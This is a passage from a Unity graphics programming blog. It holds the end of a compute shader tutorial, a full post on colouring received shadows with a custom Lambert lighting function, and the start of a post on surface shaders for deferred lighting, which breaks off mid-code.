<span class="n">float4</span><span class="p">(</span><span class="n">dataBuffer</span><span class="p">[</span><span class="n">id</span><span class="p">.</span><span class="n">x</span><span class="p">].</span><span class="n">pos</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">));</span>
<span class="p">}</span></code></pre></figure>
<p>Notice that our thread group is now organized as a 1 dimensional array. There is no performance impact regarding the dimensionality of the thread group, so you’re free to choose whatever makes the most sense for your program.</p>
<p>Setting up a structured buffer in a script is a bit different from the texture example we did earlier. For a buffer, you need to specify how many bytes a single element in the buffer is, and store that information along with the data itself inside a compute buffer object. For our example struct, the size in bytes is simply the number of float values we are storing (3 for the vector, 16 for the matrix) multiplied by the size of a float (4 bytes), for a total of 76 bytes in a struct. Setting this up in a compute buffer looks like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">public</span> <span class="n">ComputeShader</span> <span class="n">shader</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">RunShader</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">VecMatPair</span><span class="p">[]</span> <span class="n">data</span> <span class="o">=</span> <span class="k">new</span> <span class="n">VecMatPair</span><span class="p">[</span><span class="mi">5</span><span class="p">];</span>
<span class="c1">//INITIALIZE DATA HERE</span>
<span class="n">ComputeBuffer</span> <span class="n">buffer</span> <span class="o">=</span> <span class="k">new</span> <span class="n">ComputeBuffer</span><span class="p">(</span><span class="n">data</span><span class="p">.</span><span class="n">Length</span><span class="p">,</span> <span class="mi">76</span><span class="p">);</span>
<span class="n">buffer</span><span class="p">.</span><span class="n">SetData</span><span class="p">(</span><span class="n">data</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">kernel</span> <span class="o">=</span> <span class="n">shader</span><span class="p">.</span><span class="n">FindKernel</span><span class="p">(</span><span class="s">"Multiply"</span><span class="p">);</span>
<span class="n">shader</span><span class="p">.</span><span class="n">SetBuffer</span><span class="p">(</span><span class="n">kernel</span><span class="p">,</span> <span class="s">"dataBuffer"</span><span class="p">,</span> <span class="n">buffer</span><span class="p">);</span>
<span class="n">shader</span><span class="p">.</span><span class="n">Dispatch</span><span class="p">(</span><span class="n">kernel</span><span class="p">,</span> <span class="n">data</span><span class="p">.</span><span class="n">Length</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
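<p>The two numbers the script above hands to Unity, the stride and the group count, are easy to check outside of Unity. The sketch below is plain Python, not Unity code, and its names are hypothetical: it models VecMatPair as 19 tightly packed 4 byte floats, and it assumes the [numthreads(16,1,1)] kernel from earlier.</p>

```python
import struct

# Python model of the VecMatPair layout: 3 floats (Vector3) followed by
# 16 floats (Matrix4x4). "=" means tightly packed, with no padding added.
VEC_MAT_PAIR = struct.Struct("=3f16f")

THREADS_PER_GROUP = 16   # matches [numthreads(16,1,1)] in the shader
ELEMENT_COUNT = 5        # matches new VecMatPair[5]


def threads_launched(group_count, threads_per_group=THREADS_PER_GROUP):
    """Total threads started by Dispatch(kernel, group_count, 1, 1)."""
    return group_count * threads_per_group


def groups_needed(element_count, threads_per_group=THREADS_PER_GROUP):
    """Smallest group count that still gives every element a thread."""
    return (element_count + threads_per_group - 1) // threads_per_group


stride = VEC_MAT_PAIR.size
print(stride)                           # 76
print(threads_launched(ELEMENT_COUNT))  # 80
print(groups_needed(ELEMENT_COUNT))     # 1
```

<p>The stride comes out to 76 bytes, as expected. The thread count is worth a second look though: Dispatch takes a number of thread groups, so passing data.Length launches 5 groups of 16 threads (80 threads) for a 5 element buffer, and most of those threads have no element to work on. Rounding the group count up instead (1 group here) and skipping any thread whose id.x is past the end of the buffer is one common way to avoid the wasted work.</p>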
<p>Now we need to get this modified data back into a format that we can use in our script. Unlike the example above with a render texture, structured buffers need to explicitly be transferred from the GPU’s memory space back to the CPU. In my experience, this is the spot where you’ll notice the biggest performance hit when using compute shaders, and the only ways I’ve found to mitigate it are to optimize your buffers so that they’re as small as possible while still being useable and to only pull data out of your shader when you absolutely need it.</p>
<p>The code to get the data back to the CPU is really simple. All you need is an array of the same data type and size as the buffer’s data to write to. If we modified the above script to write the resulting data back to a second array, it might look like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">public</span> <span class="n">ComputeShader</span> <span class="n">shader</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">RunShader</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">VecMatPair</span><span class="p">[]</span> <span class="n">data</span> <span class="o">=</span> <span class="k">new</span> <span class="n">VecMatPair</span><span class="p">[</span><span class="mi">5</span><span class="p">];</span>
<span class="n">VecMatPair</span><span class="p">[]</span> <span class="n">output</span> <span class="o">=</span> <span class="k">new</span> <span class="n">VecMatPair</span><span class="p">[</span><span class="mi">5</span><span class="p">];</span>
<span class="c1">//INITIALIZE DATA HERE</span>
<span class="n">ComputeBuffer</span> <span class="n">buffer</span> <span class="o">=</span> <span class="k">new</span> <span class="n">ComputeBuffer</span><span class="p">(</span><span class="n">data</span><span class="p">.</span><span class="n">Length</span><span class="p">,</span> <span class="mi">76</span><span class="p">);</span>
<span class="n">buffer</span><span class="p">.</span><span class="n">SetData</span><span class="p">(</span><span class="n">data</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">kernel</span> <span class="o">=</span> <span class="n">shader</span><span class="p">.</span><span class="n">FindKernel</span><span class="p">(</span><span class="s">"Multiply"</span><span class="p">);</span>
<span class="n">shader</span><span class="p">.</span><span class="n">SetBuffer</span><span class="p">(</span><span class="n">kernel</span><span class="p">,</span> <span class="s">"dataBuffer"</span><span class="p">,</span> <span class="n">buffer</span><span class="p">);</span>
<span class="n">shader</span><span class="p">.</span><span class="n">Dispatch</span><span class="p">(</span><span class="n">kernel</span><span class="p">,</span> <span class="n">data</span><span class="p">.</span><span class="n">Length</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">);</span>
<span class="n">buffer</span><span class="p">.</span><span class="n">GetData</span><span class="p">(</span><span class="n">output</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>That’s really all there is to it. You may need to watch the profiler for a bit to get a sense of exactly how much time you’re burning transferring data to and from the CPU, but I’ve found that once you’re operating on a big enough data set, compute shaders really pay dividends.</p>
<p>One last thing - once you’re done working with your buffer, you should call buffer.Dispose() to make sure the buffer can be GC’ed. (Thanks to Andreas S for e-mailing me with this addition, and a few other corrections!).</p>
<p>If you have any questions about this (or spot a mistake in what’s here), send me a message <a href="http://twitter.com/khalladay">on twitter</a>. I won’t write shaders for you, but I’m happy to point you in the right direction for your specific use case. Happy shading!</p>
Colouring Shadows in Unity
2014-05-16T00:00:00+00:00
http://kylehalladay.com/blog/tutorial/bestof/2014/05/16/Coloured-Shadows-In-Unity
<div style="background-color:#EEAAAA;">NOTE: This article is for an old version of Unity (Unity 4...sometime in 2014) and probably won't run anymore, but the basic idea is still valid. I just don't want to spend time updating old posts every time Unity increments a version number.
</div>
<p>If you’ve ever looked for help getting different coloured shadows in your Unity game, you were probably surprised by how little there is on the forums in the way of help. In fact, at the time of writing this, the most help that Google turned up was a $50 package on the asset store. Colouring shadows is not that hard; in fact, it’s only a few lines of shader code.</p>
<p>This post is going to show you a really simple way to get some really groovy shadows in Unity.</p>
<div align="center">
<img src="/images/post_images/2014-05-16/purple_shadows.png" />
<br />
<font size="2">I added water to make this seem more impressive.</font>
<br />
</div>
<p><br /></p>
<h2>Time to Get Fabulous</h2>
<p>To make this simple, we’re going to be writing a surface shader today. It’s important to note that the shader we’re writing will set the colour of the shadows being received by the object being shaded, not the colour of the shadows cast by that object onto others. If you want the ground to show coloured shadows, the ground needs to have a shadow colouring shader. In the image above, both the sphere and the ground have the shader applied.</p>
<p>Let’s add coloured shadows to the default diffuse shader that comes with Unity. First off, we’ll need the source for that. You can grab the source for all the built-in shaders in Unity from their <a href="http://unity3d.com/unity/download/archive">downloads page</a>.</p>
<p>The default diffuse shader is in a file called Normal-Diffuse.shader. So let’s open it up, and copy the contents into a new shader in Unity:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Shader</span> <span class="s">"Colored Diffuse"</span> <span class="p">{</span>
<span class="n">Properties</span> <span class="p">{</span>
<span class="n">_Color</span> <span class="p">(</span><span class="s">"Main Color"</span><span class="p">,</span> <span class="n">Color</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span>
<span class="n">_MainTex</span> <span class="p">(</span><span class="s">"Base (RGB)"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span> <span class="p">{}</span>
<span class="p">}</span>
<span class="n">SubShader</span> <span class="p">{</span>
<span class="n">Tags</span> <span class="p">{</span> <span class="s">"RenderType"</span><span class="o">=</span><span class="s">"Opaque"</span> <span class="p">}</span>
<span class="n">LOD</span> <span class="mi">200</span>
<span class="n">CGPROGRAM</span>
<span class="cp">#pragma surface surf Lambert
</span>
<span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="n">fixed4</span> <span class="n">_Color</span><span class="p">;</span>
<span class="k">struct</span> <span class="nc">Input</span> <span class="p">{</span>
<span class="n">float2</span> <span class="n">uv_MainTex</span><span class="p">;</span>
<span class="p">};</span>
<span class="kt">void</span> <span class="n">surf</span> <span class="p">(</span><span class="n">Input</span> <span class="n">IN</span><span class="p">,</span> <span class="n">inout</span> <span class="n">SurfaceOutput</span> <span class="n">o</span><span class="p">)</span> <span class="p">{</span>
<span class="n">fixed4</span> <span class="n">c</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">IN</span><span class="p">.</span><span class="n">uv_MainTex</span><span class="p">)</span> <span class="o">*</span> <span class="n">_Color</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">=</span> <span class="n">c</span><span class="p">.</span><span class="n">rgb</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">Alpha</span> <span class="o">=</span> <span class="n">c</span><span class="p">.</span><span class="n">a</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">ENDCG</span>
<span class="p">}</span>
<span class="n">Fallback</span> <span class="s">"VertexLit"</span>
<span class="p">}</span></code></pre></figure>
<p>If you throw this on a material it should, unsurprisingly, look exactly like the “Diffuse” shader that comes with Unity. Now it’s time to have some fun. We’re going to need to write our own lighting function to get the shadows the colour we want them. Right now the shader is using the built in “Lambert” function, and ideally, our lighting should look exactly like it, just more fabulous. The easiest way to do this is to just grab the source for the Lambert function and modify that directly.</p>
<p>That built in shaders folder you downloaded also has the source code for the lighting functions (inside the file Lighting.cginc). If you open it up, and ctrl+f for “Lambert” you’ll find what we’re looking for. Let’s paste that into our shader as well:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">CGPROGRAM</span>
<span class="cp">#pragma surface surf CSLambert
</span><span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="k">struct</span> <span class="nc">Input</span> <span class="p">{</span>
<span class="n">float2</span> <span class="n">uv_MainTex</span><span class="p">;</span>
<span class="p">};</span>
<span class="n">half4</span> <span class="nf">LightingCSLambert</span> <span class="p">(</span><span class="n">SurfaceOutput</span> <span class="n">s</span><span class="p">,</span> <span class="n">half3</span> <span class="n">lightDir</span><span class="p">,</span> <span class="n">half</span> <span class="n">atten</span><span class="p">)</span> <span class="p">{</span>
<span class="n">fixed</span> <span class="n">diff</span> <span class="o">=</span> <span class="n">max</span> <span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">dot</span> <span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">Normal</span><span class="p">,</span> <span class="n">lightDir</span><span class="p">));</span>
<span class="n">fixed4</span> <span class="n">c</span><span class="p">;</span>
<span class="n">c</span><span class="p">.</span><span class="n">rgb</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">*</span> <span class="n">_LightColor0</span><span class="p">.</span><span class="n">rgb</span> <span class="o">*</span> <span class="p">(</span><span class="n">diff</span> <span class="o">*</span> <span class="n">atten</span> <span class="o">*</span> <span class="mi">2</span><span class="p">);</span>
<span class="n">c</span><span class="p">.</span><span class="n">a</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">Alpha</span><span class="p">;</span>
<span class="k">return</span> <span class="n">c</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">surf</span> <span class="p">(</span><span class="n">Input</span> <span class="n">IN</span><span class="p">,</span> <span class="n">inout</span> <span class="n">SurfaceOutput</span> <span class="n">o</span><span class="p">)</span> <span class="p">{</span>
<span class="n">half4</span> <span class="n">c</span> <span class="o">=</span> <span class="n">tex2D</span> <span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">IN</span><span class="p">.</span><span class="n">uv_MainTex</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">=</span> <span class="n">c</span><span class="p">.</span><span class="n">rgb</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">Alpha</span> <span class="o">=</span> <span class="n">c</span><span class="p">.</span><span class="n">a</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">ENDCG</span> </code></pre></figure>
<p>You’ll notice I changed the name of the lighting function (and the #pragma line which specifies which function to use). This is just to avoid confusion with the original Lambert function.</p>
<p>The lighting function is responsible for outputting the final colour of the object, which includes the colour of the shadowed area. The atten term you see above is the shadow multiplier: the higher the atten value, the brighter the surface, and the lower the atten value, the darker the shadow on that fragment.</p>
<p>Since we know that any atten value less than 1.0 means that the fragment is in shadow, subtracting atten from 1.0 will give us the strength that the shadow colour needs to be. Lighter shadows (a higher atten) will naturally have a lighter shadow colour.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">half4</span> <span class="nf">LightingCSLambert</span> <span class="p">(</span><span class="n">SurfaceOutput</span> <span class="n">s</span><span class="p">,</span> <span class="n">half3</span> <span class="n">lightDir</span><span class="p">,</span> <span class="n">half</span> <span class="n">atten</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fixed</span> <span class="n">diff</span> <span class="o">=</span> <span class="n">max</span> <span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">dot</span> <span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">Normal</span><span class="p">,</span> <span class="n">lightDir</span><span class="p">));</span>
<span class="n">fixed4</span> <span class="n">c</span><span class="p">;</span>
<span class="n">c</span><span class="p">.</span><span class="n">rgb</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">*</span> <span class="n">_LightColor0</span><span class="p">.</span><span class="n">rgb</span> <span class="o">*</span> <span class="p">(</span><span class="n">diff</span> <span class="o">*</span> <span class="n">atten</span> <span class="o">*</span> <span class="mi">2</span><span class="p">);</span>
<span class="c1">//shadow colorization</span>
<span class="n">c</span><span class="p">.</span><span class="n">rgb</span> <span class="o">+=</span> <span class="n">_ShadowColor</span><span class="p">.</span><span class="n">xyz</span> <span class="o">*</span> <span class="p">(</span><span class="mf">1.0</span><span class="o">-</span><span class="n">atten</span><span class="p">);</span>
<span class="n">c</span><span class="p">.</span><span class="n">a</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">Alpha</span><span class="p">;</span>
<span class="k">return</span> <span class="n">c</span><span class="p">;</span>
<span class="p">}</span> </code></pre></figure>
<p>Make sure that you also add the _ShadowColor color property to the shader, and as a uniform inside your CG Program. Then throw this shader onto one of your objects, and watch the magic happen.</p>
<p>You may have noticed that the above change doesn’t account for diffuse shadows, that is, unlit sides of a diffuse material. You end up with a really weird looking dissonance between the object’s dark areas, and the areas that are receiving shadows.</p>
<div align="center">
<img src="/images/post_images/2014-05-16/no_diffuse.png" />
<br />
<font size="2">Notice the difference between the areas being self shadowed, and the areas that are unlit.</font>
<br />
</div>
<p><br />
This happens because although the atten value tells us if we’re being shadowed by another object, it doesn’t account for a fragment being dark as a result of its own lighting function. In the case of a diffuse material, this is when it is pointing away from all relevant light sources.</p>
<p>What we need is to have our shadow colouring take into account both the atten value and the lighting. We can do that like so:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">half4</span> <span class="nf">LightingCSLambert</span> <span class="p">(</span><span class="n">SurfaceOutput</span> <span class="n">s</span><span class="p">,</span> <span class="n">half3</span> <span class="n">lightDir</span><span class="p">,</span> <span class="n">half</span> <span class="n">atten</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fixed</span> <span class="n">diff</span> <span class="o">=</span> <span class="n">max</span> <span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">dot</span> <span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">Normal</span><span class="p">,</span> <span class="n">lightDir</span><span class="p">));</span>
<span class="n">fixed4</span> <span class="n">c</span><span class="p">;</span>
<span class="n">c</span><span class="p">.</span><span class="n">rgb</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">*</span> <span class="n">_LightColor0</span><span class="p">.</span><span class="n">rgb</span> <span class="o">*</span> <span class="p">(</span><span class="n">diff</span> <span class="o">*</span> <span class="n">atten</span> <span class="o">*</span> <span class="mi">2</span><span class="p">);</span>
<span class="c1">//shadow colorization</span>
<span class="n">c</span><span class="p">.</span><span class="n">rgb</span> <span class="o">+=</span> <span class="n">_ShadowColor</span><span class="p">.</span><span class="n">xyz</span> <span class="o">*</span> <span class="n">max</span><span class="p">(</span><span class="mf">0.0</span><span class="p">,(</span><span class="mf">1.0</span><span class="o">-</span><span class="p">(</span><span class="n">diff</span><span class="o">*</span><span class="n">atten</span><span class="o">*</span><span class="mi">2</span><span class="p">)))</span> <span class="o">*</span> <span class="n">_DiffuseVal</span><span class="p">;</span>
<span class="n">c</span><span class="p">.</span><span class="n">a</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">Alpha</span><span class="p">;</span>
<span class="k">return</span> <span class="n">c</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
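<p>To see why the second version fixes the unlit sides, it helps to plug a few values into both shadow terms. The sketch below is a scalar model in plain Python, not shader code: it ignores the colour channels and only computes how strongly _ShadowColor gets applied, and diffuse_val is a stand-in for _DiffuseVal (assumed to be 1.0 here).</p>

```python
# Scalar model of the two shadow-colour terms from the lighting functions
# above. Plain Python, not shader code; diffuse_val stands in for _DiffuseVal.


def tint_from_atten(atten):
    """First version: shadow strength depends only on atten."""
    return 1.0 - atten


def tint_from_lighting(diff, atten, diffuse_val=1.0):
    """Second version: strength depends on the whole diffuse term."""
    return max(0.0, 1.0 - diff * atten * 2) * diffuse_val


cases = {
    "fully lit":       (1.0, 1.0),   # (diff, atten)
    "received shadow": (1.0, 0.0),
    "facing away":     (0.0, 1.0),
}
for name, (diff, atten) in cases.items():
    # Prints the first-version tint, then the second-version tint
    print(name, tint_from_atten(atten), tint_from_lighting(diff, atten))
```

<p>A surface facing away from the light (diff of 0, atten of 1) gets no tint at all from the first version, but the full tint from the second, which is what makes unlit sides match received shadows. Because of the * 2 in the diffuse term, the tint also drops to zero once diff * atten reaches 0.5.</p>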
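<p>Like _ShadowColor, the _DiffuseVal value used above needs to be added as a property and as a uniform in your CG program; since it multiplies the shadow term, it scales how strongly the shadow colour is applied. Put it all together and you should end up with the most fabulous shadow colours you’ve ever seen!</p>
<p>Extending this to other shaders is very similar to what we did here: simply grab the source for the shader you want to modify from the built-in shader source, and modify the lighting function to add shadow colour based on that specific lighting function’s equation.</p>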
<p>If you have any questions about this (or spot a mistake in what’s here), send me a message <a href="http://twitter.com/khalladay">on twitter</a>. I won’t write shaders for you, but I’m happy to point you in the right direction for your specific use case. Happy shading!</p>
Writing Shaders for Deferred Lighting in Unity3D
2014-04-05T00:00:00+00:00
http://kylehalladay.com/blog/tutorial/2014/04/05/Writing-Shaders-For-Deferred-Lighting-Unity
<div style="background-color:#EEAAAA;">NOTE: This article is for an old version of Unity (Unity 4...sometime in 2014) and probably won't run anymore, but the basic idea is still valid. I just don't want to spend time updating old posts every time Unity increments a version number.
</div>
<p>A while ago, I wrote a post called <a href="http://kylehalladay.com/all/blog/2013/10/13/Multi-Light-Diffuse.html">Writing Multi Light Pixel Shaders in Unity</a>, and covered the basics of how to write shaders that use a whole bunch of lights in forward rendering. This post is the (8 months late) sequel to that post, in which I’m going to talk about the basics of writing shaders for deferred lighting in Unity.</p>
<p>Unlike last time though, we’re going to be writing surface shaders today; I’ll explain why that is below. If you’re unfamiliar with surface shaders, now would probably be a good time to head over to the <a href="https://docs.unity3d.com/Documentation/Components/SL-SurfaceShaders.html">Unity docs</a> and read up a little bit. Don’t worry about grokking all of it though, we aren’t doing anything fancy today.</p>
<p>If you’re dead set on writing pixel shaders that work with deferred lighting, check out my post on that <a href="http://kylehalladay.com/blog/tutorial/2015/01/03/Deferred-Pixel-Shaders.html">here</a>.</p>
<div align="center">
<img src="/images/post_images/2014-04-05/Deferred_intro.png" />
<br />
<font size="2">A quick demo of deferred lighting: all 16 lights in the scene are treated as pixel lights</font>
<br />
</div>
<p><br /></p>
<p>It seems easiest to start by describing how forward rendering and deferred lighting work so that we can see how they differ from one another, and understand what our shaders are actually doing in the deferred rendering path.</p>
<h2>A Very Brief Intro to Forward Rendering</h2>
<p>In traditional forward rendering, each object is drawn once for every pixel light that touches it (with all the vertex lights being lumped into the base pass). Each pass works independently of the other passes, and runs a vertex and a fragment shader to do its magic (and then adds that result to the previous passes).</p>
<p>This works great for simple scenes, but when you need to have a large number of lights it can get bogged down pretty quickly. To use draw calls as an example: in forward rendering your draw call count is (roughly) numberOfObjects * numberOfLights.</p>
<p>For example: the screenshot above has 16 spheres, each lit by 16 pixel lights. Predictably, this results in 256 draw calls, as shown in the stats window:</p>
<div align="center">
<img src="/images/post_images/2014-04-05/Forward_drawcalls.png" />
</div>
<p><br /></p>
<p>Normally Unity would use a bunch of tricks to minimize those draw calls, such as batching calls and automatically setting some lights to vertex lights, but I’ve turned all that off for demonstration purposes.</p>
<p>So if forward rendering chokes with tons of lights, how do games render scenes with hundreds of lights in them? That’s where deferred techniques come in.</p>
<h2>A Brief Intro to Deferred Lighting</h2>
<p>Deferred lighting solves the problem of handling a large number of lights by assuming that all objects use the same lighting model, and then calculating the lighting contribution to each pixel on the screen in a single pass. This allows the rendering speed to be dependent on the number of pixels being rendered, not the objects in the scene.</p>
<p>As described in greater detail in <a href="http://docs.unity3d.com/Documentation/Components/RenderTech-DeferredLighting.html">the docs</a>, Unity’s deferred lighting system is a 3 step process.</p>
<ol>
<li>
<strong>Step 1</strong>: Initial data buffers are constructed. These buffers consist of a depth buffer (Z-Buffer), and a buffer containing the specular power and normals of the objects visible to the camera (G-Buffer). </li>
<li><br />
<strong>Step 2:</strong> the previously built buffers are combined to compute the lighting for each pixel on the screen.
</li><br />
<li>
<strong>Step 3</strong>: all of the objects are drawn again. This time, they are shaded with a combination of the computed lighting from step 2 and their surface properties (texture, colour, lighting function, etc).
</li>
</ol>
<p>As you may have guessed, this technique comes with much more overhead than forward rendering, but it also scales much better for complex scenes. To relate things back to draw calls, each object produces 2 draw calls, and each light produces 1 call (+1 for lightmapping). Thus, the example scene from above ends up being roughly 16 ∗ 2 + 16 ∗ 2 = 64 draw calls. Unity’s stats window says 65; don’t ask me where that extra one came from.</p>
<div align="center">
<img src="/images/post_images/2014-04-05/Deferred_drawcalls.png" />
</div>
<p><br /></p>
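<p>To make that arithmetic concrete, here’s a minimal sketch of the two estimates as plain C#. The class and method names are made up for illustration, and the deferred formula simply encodes the rough “2 calls per object, 2 calls per light” count described above; it isn’t something Unity itself reports.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#">using System;

// Hypothetical helper, only here to illustrate the rough estimates from the text
public static class DrawCallEstimate
{
    // Forward rendering: every object is drawn once per pixel light touching it
    public static int Forward(int objects, int pixelLights)
    {
        return objects * pixelLights;
    }

    // Deferred lighting: 2 calls per object, plus 1 call per light
    // (+1 for lightmapping), following the rough count given above
    public static int Deferred(int objects, int lights)
    {
        return objects * 2 + lights * 2;
    }

    public static void Main()
    {
        Console.WriteLine(Forward(16, 16));  // prints 256
        Console.WriteLine(Deferred(16, 16)); // prints 64
    }
}</code></pre></figure>
<p>The interesting part is how the two grow: doubling the light count doubles the forward estimate, but only adds another 32 calls to the deferred one.</p>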
<p>It’s worth noting that draw calls really aren’t a great way to measure how performant a rendering technique is, but they’re a useful way to understand how these techniques differ from one another. In actuality, it’s more useful to say that forward rendering’s performance is dependent on the number of lights and objects in a scene, whereas deferred lighting’s performance is dependent on the number of lights and the number of pixels being lit on the screen.</p>
<p>One final thing: Unity uses “deferred lighting” (aka Light Pre-Pass), which is different from the confusingly similarly named “deferred rendering.” I won’t go into the differences here, but just be aware of this so you’re not confused later.</p>
<h2>So about those shaders...</h2>
<p>As you may also have noticed from the above description, deferred lighting assumes that all objects use the same lighting model. This doesn’t mean that objects can’t appear to be lit differently, but it does mean that things like light attenuation and how the diffuse and specular terms are calculated are uniform across all objects.</p>
<p>As such, one of the tradeoffs with deferred lighting is a loss of control in your shaders. Since the lighting model is uniform across all objects, we no longer get to define that per shader.</p>
<p>In light of this, surface shaders are the best way to tackle writing custom shaders for deferred lighting. They’re already set up to work with Unity’s system, and enforce the restrictions we’re working with by design.</p>
<h2>Let's write something already</h2>
<p>To start off, create a new shader. Unity will give you a skeleton of a surface shader. I’ll post it here for those of you not playing along at home:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Shader</span> <span class="s">"Custom/DeferredDiffuse"</span>
<span class="p">{</span>
<span class="n">Properties</span>
<span class="p">{</span>
<span class="n">_MainTex</span> <span class="p">(</span><span class="s">"Base (RGB)"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span> <span class="p">{}</span>
<span class="p">}</span>
<span class="n">SubShader</span>
<span class="p">{</span>
<span class="n">Tags</span> <span class="p">{</span> <span class="s">"RenderType"</span><span class="o">=</span><span class="s">"Opaque"</span> <span class="p">}</span>
<span class="n">LOD</span> <span class="mi">200</span>
<span class="n">CGPROGRAM</span>
<span class="cp">#pragma surface surf Lambert
</span>
<span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="k">struct</span> <span class="nc">Input</span> <span class="p">{</span>
<span class="n">float2</span> <span class="n">uv_MainTex</span><span class="p">;</span>
<span class="p">};</span>
<span class="kt">void</span> <span class="n">surf</span> <span class="p">(</span><span class="n">Input</span> <span class="n">IN</span><span class="p">,</span> <span class="n">inout</span> <span class="n">SurfaceOutput</span> <span class="n">o</span><span class="p">)</span> <span class="p">{</span>
<span class="n">half4</span> <span class="n">c</span> <span class="o">=</span> <span class="n">tex2D</span> <span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">IN</span><span class="p">.</span><span class="n">uv_MainTex</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">=</span> <span class="n">c</span><span class="p">.</span><span class="n">rgb</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">Alpha</span> <span class="o">=</span> <span class="n">c</span><span class="p">.</span><span class="n">a</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">ENDCG</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>Out of the box, Unity’s built in lighting functions all work fine with deferred lighting, so technically, the above is a fully functioning diffuse deferred shader.</p>
<p>Here’s how this plays out in deferred lighting (roughly):</p>
<ul>
<li>The surface function defines all the material specific properties for this object</li>
<li>Unity computes the lighting buffer. If the surface function writes to a variable used in one of these buffers (like the fragment’s normal), the data for the buffer comes from the surface function instead of the raw geometry.</li>
<li>The Lambert lighting function controls how the lighting buffer and object’s surface properties get combined into the final output for the current fragment.</li>
</ul>
<p>Now, using the built in Lambert lighting function is cheating a bit, so let’s see how to write our own diffuse lighting function:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">float4</span> <span class="nf">LightingMyDiffuse_PrePass</span><span class="p">(</span><span class="n">SurfaceOutput</span> <span class="n">i</span><span class="p">,</span> <span class="n">float4</span> <span class="n">light</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">float4</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">*</span> <span class="n">light</span><span class="p">.</span><span class="n">rgb</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>This is very similar to writing lighting functions for forward rendering. All you have to do is add “_PrePass” to the end of the function name, and change the input arguments to take the output struct from your surface function and a single float4 for the combined lighting at that pixel.</p>
<p>That’s really all there is to it. For completeness’ sake, here’s the full shader, and how it looks:</p>
<div align="center">
<img src="/images/post_images/2014-04-05/Deferred_final.png" />
</div>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Shader</span> <span class="s">"Custom/DeferredDiffuse"</span>
<span class="p">{</span>
<span class="n">Properties</span>
<span class="p">{</span>
<span class="n">_MainTex</span> <span class="p">(</span><span class="s">"Base (RGB)"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span> <span class="p">{}</span>
<span class="p">}</span>
<span class="n">SubShader</span>
<span class="p">{</span>
